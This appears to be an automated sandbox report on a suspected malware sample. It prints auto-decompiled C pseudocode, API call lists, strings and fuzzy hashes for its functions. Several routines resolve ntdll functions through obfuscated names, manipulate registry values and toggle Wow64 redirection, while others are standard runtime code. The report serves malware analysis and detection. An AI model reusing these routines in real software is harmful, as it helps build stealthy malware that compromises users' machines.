API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 153433846-3145022300
Opcode ID: a1c577e7a7fe06a0d8f3e36c08da0fc5a40986e460d3028bc25f038202eebf3a
Instruction ID: 24a92fc28ffa20d1ed09a0231849950d761a9d1c9887f73e1b4ecd0fbfc30e3c
Opcode Fuzzy Hash: a1c577e7a7fe06a0d8f3e36c08da0fc5a40986e460d3028bc25f038202eebf3a
Instruction Fuzzy Hash: AE31C532508220CFCB10CF24CC90B5AB7F5EB89728F054A19E85997B91E775ED05CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6C53DEE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C53DF0D

Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011

std::_Lockit::_Lockit.LIBCPMT ref: 6C53DF33
std::bad_exception::bad_exception.LIBCMT ref: 6C53DFB7
__CxxThrowException@8.LIBCMT ref: 6C53DFC6
std::_Facet_Register.LIBCPMT ref: 6C53DFDD

Strings

bad cast, xrefs: 6C53DFAE

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 153433846-3145022300
Opcode ID: 6e511c3f4308784bb198772bdeab7a2bfec85ee58d8fe09a2b453b4d99a871b2
Instruction ID: 6b89a0006f1cd8ad394a4d0d3db7ddc34f10d4aa20033ce2df97baf30461c1f4
Opcode Fuzzy Hash: 6e511c3f4308784bb198772bdeab7a2bfec85ee58d8fe09a2b453b4d99a871b2
Instruction Fuzzy Hash: 0A31C371518220DFCB11CF28CC84B5AB7F5EB8A728F154619E85997B91E730ED09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 005063CD, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E005063CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00502BF3(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x50a2d0; // 0x2add5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x50b4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x50b92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x50a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x005063cd
0x005063d4
0x005063d8
0x005063dd
0x005063e4
0x005063e7
0x005063f1
0x005063f6
0x00506402
0x00506409
0x00506413
0x00506413
0x0050640b
0x0050640b
0x0050640b
0x0050640b
0x00506419
0x0050641c
0x00506424
0x00506427
0x0050642a
0x0050642d
0x00506432
0x0050643b
0x00506448
0x0050643d
0x00506443
0x00506443
0x0050644e
0x0050644e
0x00506456

APIs

Part of subcall function 00502BF3: SysAllocString.OLEAUT32(?), ref: 00502C4F
Part of subcall function 00502BF3: SysAllocString.OLEAUT32(0070006F), ref: 00502C63
Part of subcall function 00502BF3: SysAllocString.OLEAUT32(00000000), ref: 00502C75
Part of subcall function 00502BF3: SysFreeString.OLEAUT32(00000000), ref: 00502CD9

memset.NTDLL ref: 005063F1
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0050642D
GetLastError.KERNEL32 ref: 0050643D
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 0050644E

Strings

@{P, xrefs: 00506433
<, xrefs: 00506402

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <$@{P
API String ID: 593937197-1520035578
Opcode ID: 01a47f2c35e04220862c7d5b9a9ef090416526b905c9dce56481035118618dee
Instruction ID: fe2f56cb0a653fd84fd54a4d5280f3d3b7133c226fb132ab407d529db7eeceef
Opcode Fuzzy Hash: 01a47f2c35e04220862c7d5b9a9ef090416526b905c9dce56481035118618dee
Instruction Fuzzy Hash: 75110C71900218ABDB10DFA5D8C9BDD7FF8BB08384F048426F905EB291E7749504CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00502BF3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00502C4F
SysAllocString.OLEAUT32(0070006F), ref: 00502C63
SysAllocString.OLEAUT32(00000000), ref: 00502C75
SysFreeString.OLEAUT32(00000000), ref: 00502CD9
SysFreeString.OLEAUT32(00000000), ref: 00502CE8
SysFreeString.OLEAUT32(00000000), ref: 00502CF3

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0c91d17674c1e2fc262378a4024044599d3d28486ec5953ac328d8ac293b65d1
Instruction ID: ee146c1de70f8ebfa8d02586fabdf9c168a44d30c4df84567ab85c1ac5b9c067
Opcode Fuzzy Hash: 0c91d17674c1e2fc262378a4024044599d3d28486ec5953ac328d8ac293b65d1
Instruction Fuzzy Hash: 2D314F32D00A09ABDB01DFA8C94DA9FBBB6BF49300F144465ED11EB161DB719E0ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 005071A3, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005071A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00505C4E(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x50a2d0; // 0x2add5a8
					_t1 = _t23 + 0x50b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x50a2d0; // 0x2add5a8
					_t2 = _t26 + 0x50b787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00502A03(_t54);
					} else {
						_t30 =  *0x50a2d0; // 0x2add5a8
						_t5 = _t30 + 0x50b774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x50a2d0; // 0x2add5a8
							_t7 = _t33 + 0x50b797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x50a2d0; // 0x2add5a8
								_t9 = _t36 + 0x50b756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x50a2d0; // 0x2add5a8
									_t11 = _t39 + 0x50b7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0050225C(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x005071b2
0x005071b6
0x00507278
0x005071bc
0x005071bc
0x005071c1
0x005071d4
0x005071d6
0x005071db
0x005071e3
0x005071ea
0x005071ee
0x005071f1
0x00507270
0x00507271
0x005071f3
0x005071f3
0x005071f8
0x00507200
0x00507204
0x00507207
0x00000000
0x00507209
0x00507209
0x0050720e
0x00507216
0x0050721a
0x0050721d
0x00000000
0x0050721f
0x0050721f
0x00507224
0x0050722c
0x00507230
0x00507233
0x00000000
0x00507235
0x00507235
0x0050723a
0x00507242
0x00507246
0x00507249
0x00000000
0x0050724b
0x00507251
0x00507256
0x0050725d
0x00507264
0x00507267
0x00000000
0x00507269
0x0050726c
0x0050726c
0x00507267
0x00507249
0x00507233
0x0050721d
0x00507207
0x005071f1
0x00507286

APIs

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00507852,?,?,?,?,00000000,00000000), ref: 005071C8
GetProcAddress.KERNEL32(00000000,7243775A), ref: 005071EA
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00507200
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00507216
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0050722C
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00507242

Part of subcall function 0050225C: memset.NTDLL ref: 005022DB

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 47d777901c29a130a9a92938fae52d53ce8014372814bdc8f26deca820c47c9d
Instruction ID: 425f9ac93dd1a0174db98f77a7e9111afd3112486fd9861972959109a18d4b68
Opcode Fuzzy Hash: 47d777901c29a130a9a92938fae52d53ce8014372814bdc8f26deca820c47c9d
Instruction Fuzzy Hash: AD21F9B550470AAFDB20DFA9CE84E6E7BECFB58340B0145A5B805C7261E731E909DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C54C541, Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__mtinitlocks.LIBCMT ref: 6C54C546
__mtterm.LIBCMT ref: 6C54C54F
__calloc_crt.LIBCMT ref: 6C54C574
__initptd.LIBCMT ref: 6C54C596
GetCurrentThreadId.KERNEL32 ref: 6C54C59D

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
String ID:
API String ID: 2314865971-0
Opcode ID: 7fa9ce45af2ec6482d4151b97cfcc817b04ce953337f276aa2dae583f31a88ce
Instruction ID: 450b48cbd1d5bf3d31011e6910bc922675441b8ffd56e78f29fa017a9fcd88cb
Opcode Fuzzy Hash: 7fa9ce45af2ec6482d4151b97cfcc817b04ce953337f276aa2dae583f31a88ce
Instruction Fuzzy Hash: DBF02B326196519EEA247A746C016DF3ED08FC27B8F21C61AE060D5FD0FF11BC4D92A4

Uniqueness

Uniqueness Score: -1.00%

Function 6C5421E6, Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

____lc_codepage_func.LIBCMT ref: 6C5421EA
__calloc_crt.LIBCMT ref: 6C5421FB

Part of subcall function 6C547076: __calloc_impl.LIBCMT ref: 6C547085

___pctype_func.LIBCMT ref: 6C54220E
_memmove.LIBCMT ref: 6C542217
___pctype_func.LIBCMT ref: 6C542228
____lc_locale_name_func.LIBCMT ref: 6C542234

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
String ID:
API String ID: 1321936363-0
Opcode ID: 8d6311f69feffcaa9524e7c25394635f42cf47d37fc1137e5c74f253cb285a3a
Instruction ID: dd036db6073648b4b921246560563bc2f7dccf9fa799ff66045b81171161632a
Opcode Fuzzy Hash: 8d6311f69feffcaa9524e7c25394635f42cf47d37fc1137e5c74f253cb285a3a
Instruction Fuzzy Hash: 52F0A971544B01EBE7109FA5AC09B86B7D4AF40359F10C82DE598CBB80EBB5E8448B51

Uniqueness

Uniqueness Score: -1.00%

Function 6C5404B0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 208COMMON

Download Yara Rule

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C5404D3

Part of subcall function 6C543E01: _malloc.LIBCMT ref: 6C543E19

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 6C540507
_memmove.LIBCMT ref: 6C54057B

Strings

string too long, xrefs: 6C5405B4

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception$_malloc_memmove
String ID: string too long
API String ID: 4023115364-2556327735
Opcode ID: 328f56d0a355aecfea1c6635686e23498e51967527770bfdf0ed9e88d1548f91
Instruction ID: 3f3128896fdc98e9325244940e7c7e56eb08946a64dd683fd655f9b03fcfda5a
Opcode Fuzzy Hash: 328f56d0a355aecfea1c6635686e23498e51967527770bfdf0ed9e88d1548f91
Instruction Fuzzy Hash: 2751E9327012518BD7248E2CAC50A5BB3A5EFE1714F308D2FE592CBF81D761E845C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0050202E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 172
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0050202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x50a38c);
					_t97 = 0x80000002;
					L6:
					_t60 = E005033FA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t15 =  &_a24; // 0x50742d
					_t107 =  *_t15;
					if(E00504B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E00502A03(_a8);
						goto L29;
					}
					_t65 =  *0x50a2d0; // 0x2add5a8
					_t16 = _t65 + 0x50b908; // 0x65696c43
					_t68 = E005033FA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						if(E00505C15(_t103,  *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x50a384,  *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x14)) + 0x28))) == 0) {
							_t72 =  *0x50a2d0; // 0x2add5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x50ba0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x50b927; // 0x55434b48
								_t73 = _t34;
							}
							_t37 =  &_a24; // 0x50742d
							if(E0050762C(_t73,  *0x50a384,  *0x50a388, _t37,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x50a2d0; // 0x2add5a8
									_t44 = _t75 + 0x50b893; // 0x74666f53
									_t78 = E005033FA(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t45 =  &_a24; // 0x50742d
										E005033B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x50a388,  *_t45);
										E005033B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _t105,  *0x50a380, _a16);
										E00502A03(_t105);
									}
								} else {
									_t38 =  &_a24; // 0x50742d
									E005033B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x50a388,  *_t38);
									E005033B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x50a380, _a16);
								}
								if( *_t107 != 0) {
									_t52 =  &_a24; // 0x50742d
									E00502A03( *_t52);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					if(E00505419( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t24 =  &_a24; // 0x50742d
							E00505C15(_t103,  *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *_t24, _t106);
						}
						E00502A03(_t106);
						_t104 = _a16;
					}
					_t28 =  &_a24; // 0x50742d
					E00502A03( *_t28);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E00507973(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x50a38c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

0x0050202e
0x00502037
0x0050203e
0x00502043
0x005020b0
0x005020b6
0x005020bb
0x005020c4
0x005020cb
0x005020ce
0x00502242
0x00502249
0x00502249
0x0050224e
0x00502250
0x00502250
0x00502259
0x00502259
0x005020d4
0x005020d4
0x005020e0
0x00502238
0x0050223b
0x00000000
0x0050223b
0x005020e6
0x005020eb
0x005020f4
0x005020fb
0x005020fe
0x00502148
0x00502165
0x0050216d
0x00502172
0x0050217c
0x0050217c
0x00502174
0x00502174
0x00502174
0x00502174
0x00502186
0x0050219e
0x005021a6
0x005021d4
0x005021d9
0x005021e2
0x005021e7
0x005021eb
0x0050221d
0x005021ed
0x005021ed
0x005021fd
0x00502210
0x00502216
0x00502216
0x005021a8
0x005021a8
0x005021b8
0x005021cd
0x005021cd
0x00502227
0x00502230
0x00502233
0x00502229
0x0050222c
0x0050222c
0x00502227
0x0050219e
0x00000000
0x00502165
0x00502117
0x00502119
0x0050211e
0x00502122
0x00502124
0x00502128
0x00502132
0x00502132
0x00502138
0x0050213d
0x0050213d
0x00502140
0x00502143
0x00000000
0x00502143
0x00502048
0x00000000
0x0050206f
0x0050206f
0x0050207b
0x0050208e
0x00502094
0x0050209c
0x00000000
0x0050209c

APIs

StrChrA.SHLWAPI(00507319,0000005F,00000000,00000000,00000104), ref: 00502061
lstrcpy.KERNEL32(?,?), ref: 0050208E

Part of subcall function 005033FA: lstrlen.KERNEL32(?,0050A380,73BB7FC0,00000000,00502788,?,?,?,?,?,00503EAC,?), ref: 00503403
Part of subcall function 005033FA: mbstowcs.NTDLL ref: 0050342A
Part of subcall function 005033FA: memset.NTDLL ref: 0050343C

Part of subcall function 005033B7: lstrlenW.KERNEL32(00507319,?,-tP,00502202,00000000,80000002,?,-tP,74666F53,4D4C4B48,-tP,?,00000000,80000002,00507319,?), ref: 005033D7

Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F

lstrcpy.KERNEL32(?,00000000), ref: 005020B0

Strings

-tP, xrefs: 005020D4, 00502186, 00502230, 005021ED, 005021A8, 00502140, 00502128, 00502189
\, xrefs: 00502094

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: -tP$\
API String ID: 3924217599-3836213674
Opcode ID: 59a7593bf89793a51705315d67465467dd013af7b6e54df66df0b22d0122fa5e
Instruction ID: 0018446a5262340a48c423e5e672bad1248e4e20a32e505da59a8c6aeb35680d
Opcode Fuzzy Hash: 59a7593bf89793a51705315d67465467dd013af7b6e54df66df0b22d0122fa5e
Instruction Fuzzy Hash: 9D51487650020AAFDF219FA0DC89EAE3BB9FF58300F108855FA15961A1DB35DA19EF11

Uniqueness

Uniqueness Score: -1.00%

Function 00504CD5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00504CD5(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x50a2c8; // 0xbd092303
				_t1 =  &_a4; // 0x507338
				_t32 =  *_t1;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x50a2d0; // 0x2add5a8
				_t3 = _t8 + 0x50b84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00501970(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x50a2d4, 1, 0, _t30);
					E00502A03(_t30);
				}
				_t12 =  *0x50a2b4; // 0x2000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E005019E7() == 0) {
						_t28 =  *0x50a124( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E005063CD(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00507836(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00504cd6
0x00504cdd
0x00504cdd
0x00504ce7
0x00504ceb
0x00504cf1
0x00504cfe
0x00504d05
0x00504d09
0x00504d1b
0x00504d1d
0x00504d1d
0x00504d22
0x00504d29
0x00504d34
0x00504d4a
0x00504d4e
0x00504d50
0x00504d55
0x00504d55
0x00504d62
0x00504d66
0x00504d6a
0x00000000
0x00000000
0x00504d78
0x00504d7c
0x00000000
0x00000000
0x00504d7c
0x00504d66
0x00000000
0x00504d7e
0x00504d7e
0x00504d7e
0x00504d84
0x00504d86
0x00504d86
0x00504d90
0x00504d94
0x00504da6
0x00504da6
0x00504daa
0x00504db0
0x00504db0
0x00504db3
0x00504db5
0x00504db8
0x00504db8
0x00504dbf
0x00504dc5
0x00504dc5

APIs

Part of subcall function 00501970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00503EC5,74666F53,00000000,?,00000000,?,?,00502F4F), ref: 005019A6
Part of subcall function 00501970: lstrcpy.KERNEL32(00000000,00000000), ref: 005019CA
Part of subcall function 00501970: lstrcat.KERNEL32(00000000,00000000), ref: 005019D2

CreateEventA.KERNEL32(0050A2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00507338,?,?,?), ref: 00504D14

Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F

WaitForSingleObject.KERNEL32(00000000,00004E20,8sP,00000000,?,00000000,?,00507338,?,?,?,?,?,?,?,00501C40), ref: 00504D72
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00507338,?,?,?), ref: 00504DA0
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00507338,?,?,?), ref: 00504DB8

Strings

8sP, xrefs: 00504CDD, 00504D41, 00504D58

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID: 8sP
API String ID: 73268831-3124762363
Opcode ID: e36d04cac9989331e58a216b8c5c143055f737fa4d547feaaedd31b2130c74bd
Instruction ID: 4f05aa4910456ab2cacc1a8d95b86829c99e7a6d7d354c2462ea68d57462533f
Opcode Fuzzy Hash: e36d04cac9989331e58a216b8c5c143055f737fa4d547feaaedd31b2130c74bd
Instruction Fuzzy Hash: 6F21E2B3600726ABD7215BA89D88B9F7BD8BF58711F050624FF41972D1EB70CC049AC1

Uniqueness

Uniqueness Score: -1.00%

Function 00505419, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00505419(int _a4, void* _a8, int _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				intOrPtr* _t39;
				char* _t42;
				long _t43;

				if(_a4 != 0) {
					_t43 = E00506087(_a4, _a8, _a12, _a16, _a20, _a24);
				} else {
					_t43 =  *0x50a0d0(_a8, _a12,  &_a8);
					if(_t43 == 0) {
						RegQueryValueExW(_a8, _a16, 0,  &_a4, 0,  &_a12);
						if(_a12 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E00505C4E(_a12);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a8, _a16, 0,  &_a4, _t42,  &_a12);
								if(_t43 != 0) {
									E00502A03(_t42);
								} else {
									 *_a20 = _t42;
									_t39 = _a24;
									if(_t39 != 0) {
										 *_t39 = _a12;
									}
								}
							}
						}
						RegCloseKey(_a8);
					}
				}
				return _t43;
			}

0x00505425
0x005054cf
0x0050542b
0x0050543b
0x0050543f
0x0050545b
0x00505460
0x005054a8
0x00505462
0x0050546a
0x0050546e
0x005054a5
0x00505470
0x00505482
0x00505486
0x0050549c
0x00505488
0x0050548b
0x0050548d
0x00505492
0x00505497
0x00505497
0x00505492
0x00505486
0x0050546e
0x005054b0
0x005054b0
0x0050543f
0x005054d8

APIs

RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43,80000002), ref: 0050545B
RegCloseKey.ADVAPI32(80000002,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43,80000002,00000000,?), ref: 005054B0

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43), ref: 00505480

Strings

-tP, xrefs: 00505423
6{P, xrefs: 00505435

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: QueryValue$AllocateCloseHeap
String ID: -tP$6{P
API String ID: 466008484-867194812
